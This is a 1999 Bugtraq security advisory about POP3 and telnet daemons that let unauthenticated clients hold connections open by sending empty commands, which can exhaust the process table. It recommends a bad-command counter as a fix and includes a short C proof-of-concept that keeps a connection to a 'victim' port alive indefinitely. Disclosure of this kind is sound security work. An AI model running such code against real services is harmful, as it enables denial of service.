Date: Wed, 28 Apr 1999 13:59:28 +0200
From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
To: BUGTRAQ@netspace.org
Subject: KKIS.28041999.002.b

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                          ###  ###  ###  ###  ###
                          ### ###   ### ###   ###
                          ######    ######    ###
                          ### ###   ### ###   ###
                          ###  ###  ###  ###  ###

                              S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 KKI Security Team                              Cracow Commercial Internet
 http://www.security.kki.pl                     http://www.kki.pl
 mailto:security@security.kki.pl                mailto:biuro@kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Raport title        : Flaws in implementations of mechanisms which
                       prevents from maintaining the parasitize connections
                       in many tcp network services.
 Problem found by    : Lukasz Luzar (lluzar@security.kki.pl)
 Raport created by   : Robert Pajak (shadow@security.kki.pl)
                       Lukasz Luzar (lluzar@security.kki.pl)
 Raport published    : 28 April 1999
 Raport code         : KKIS.28041999.002.b
 Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...
 Systems affected    : Linux, FreeBSD, Solaris, ...
 Archive             : http://www.security.kki.pl/advisories/
 Risk level          : low

~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  The designers of many popular network services are trying to make the
 mechanisms which should prevents from maintaining the parasitize connections
 to their programs.
 The exercise of such protection is timeout, which closes inactive
 connections.
 But some of those designers forgets that some malicious guys may often
 and fraquently send strings full of bad or null commands to the open port
 of the service. Such situation might happen before login/password
 authentication of the connection.
  Those programmers should implement additional mechanisms to prevent such
 situations. Good solution is to put counter of bad (or null) commands
 inside the program.

  For example, the similiar mechanism has been applied in sendmail.
 This soluition is effective and very easy to implement.

  Lack of this mechanism may be quite threateing, because most of that tcp
 services are working with root privilages, and the bounds of amount of root
 proceses isn't easy, when the service has no internal bound.
  That affects whole system, when proccess table is fulfiled for
 example by multiply open connections to the vulnerable tcp service.

  Worst situation is, when vulnerable service doesn't logs any information
 about connection before authentication with login/password.
 One of this most vulnerable services is cucipop.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  Below example shows how to open and maintain the connection,
 which might state open by undefined time.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 --- CUT HERE ---
 /*
  *  example.c by Lukasz Luzar (lluzar@security.kki.pl)
  */

 #include <stdio.h>
 #include <unistd.h>
 #include <string.h>
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netinet/in.h>
 #include <arpa/inet.h>

 /* victim's address and port of service */
 #define ADDR "10.0.0.1"        //IP in dot natation
 #define PORT 110       //e.g. some pop3
 #define DELAY 4        //(4 secs.) how often we are sending bad commands
 #define COMMAND "\n"   //some bad (or null) command

 void main()
 {
        int     sockfd,
                j,k;
        struct sockaddr_in victim_addr;

        bzero((char *) &victim_addr, sizeof( victim_addr));

        victim_addr.sin_family = AF_INET;
        victim_addr.sin_addr.s_addr = inet_addr( ADDR);
        victim_addr.sin_port = htons( PORT);

        if(( sockfd = socket( AF_INET, SOCK_STREAM, 0)) < 0)
                fprintf( stderr, "socket error\n");

        if( connect( sockfd,(struct sockaddr*) &victim_addr,
            sizeof( victim_addr)) < 0)
                fprintf( stderr,"connect error\n");

        k = 1;
        if( setsockopt( sockfd,IPPROTO_TCP,TCP_NODELAY,&k,sizeof( k)) != 0)
                fprintf( stderr,"setsockopt error\n");

        j = strlen( COMMAND);

        for(;;) {
                if( write( sockfd,COMMAND,j) == -1)
                        fprintf( stderr,"write error\n");
                fprintf( stderr,".");
                sleep( DELAY);
        }

 }
 --- CUT HERE ---

~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Copyright (c) 1999 KKI Security Team, Poland
 All rights reserved.

 All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~